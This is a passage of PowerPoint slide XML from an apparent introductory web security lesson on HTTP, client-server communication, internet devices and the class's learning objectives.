            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868935" y="5334000"/>
            <a:ext cx="7406130" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client-Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Communication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>backbone of the modern web.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32E8875B-CC14-4930-9E45-2FDEFD9DF5A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203255" y="5105400"/>
            <a:ext cx="873749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36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9B02-7484-4B51-8C5F-0CA9AA1034AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Major Players</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24707555-D2DE-47A6-A6E5-C76342C3AD05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="990600"/>
            <a:ext cx="8534400" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The key devices that support the Internet are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Clients </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>are devices that initiate HTTP requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Routers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>determine how to get traffic from a client to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Servers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>are devices that fulfill requests/provide responses to requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Proxy Servers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>are servers that sit between clients and destination servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="446164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321488-FA06-429A-A5C4-E87BBC91D54D}"/>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CD78178-C01D-493E-B032-2D38745B4190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="372534" y="691446"/>
            <a:ext cx="8291015" cy="3728154"/>
            <a:chOff x="533400" y="996246"/>
            <a:chExt cx="8291015" cy="3728154"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDE340C6-339F-4595-843C-0D25A1636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43000"/>
              <a:ext cx="2286000" cy="2286000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08BF9188-3667-4599-AF36-6E79F1A0E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523" y="996246"/>
              <a:ext cx="2508954" cy="2508954"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D5149AD-A398-46D3-8D8C-DF873202442C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="803455" y="3647182"/>
              <a:ext cx="1841530" cy="1077218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>6,000 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Tweets</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EBC0D8F-720E-4EF8-83C5-AD206D615A96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3581400" y="3647182"/>
              <a:ext cx="1917512" cy="1077218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>40,000 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Queries</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{485AC25A-D4FA-41D4-82B9-49F2BBE48680}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6312189" y="3647182"/>
              <a:ext cx="2512226" cy="1077218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2,000,000 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Emails</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{831C661F-06D6-499D-A9DC-940057FF2230}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753534" y="4724400"/>
            <a:ext cx="769620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9F895CA-E92E-4D4D-BD08-584F63849C96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052047" y="4953000"/>
            <a:ext cx="5039906" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EVERY SECOND</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C58497D3-847E-449C-83D0-58C611824C93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA7CF4F9-41F2-4388-87C6-4EF1748B0A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1322" y="746335"/>
            <a:ext cx="2512227" cy="2512227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25477895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629400" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Revisited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3533900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7C6FF1-9C91-4934-AA12-C70703CED57C}"/>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2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE3AA8B-5085-4057-A225-758034F06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3999" cy="4876800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED3C6BF-F371-480F-9713-273E79346CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235189" y="5334000"/>
            <a:ext cx="6673622" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:// Our Favorite Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1098715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2632-98A9-CF41-BDE0-3A46C5A8C405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="0"/>
            <a:ext cx="8153400" cy="653854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By the end of today’s class, you will be able to: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A152DD-9925-6948-B278-55544873B24D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577516" y="1275347"/>
            <a:ext cx="8153401" cy="5170646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Discuss how the threat landscape due to web is growing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Explain the network structure of the internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Explain the components of HTTP requests and responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use the curl command to send HTTP requests via the command line and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>intepret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> the contents of the responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Distinguish between HTML, CSS, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> within the context of front-end resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Inspect the major features of an HTML document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Discuss Same Origin Policy and why it matters in a security context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use the Network Inspector tool to analyze requests and responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1513732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E8FE-44FF-3F47-9559-72068F4C258C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="0"/>
            <a:ext cx="8610600" cy="653854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a client such as a web browser issues a request, it:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD7EA9B3-79BC-6145-AD1E-E7DC61910E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="914400"/>
            <a:ext cx="8305800" cy="5478423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generates a HTTP request for a specific resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sends the request to the Internet gateway/access point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then, the gateway forwards the request to the target server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When the server receives the request, it finds the requested resource, and sends it back to the gateway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" b="1" i="1" dirty="0">
              <a:solidFill>
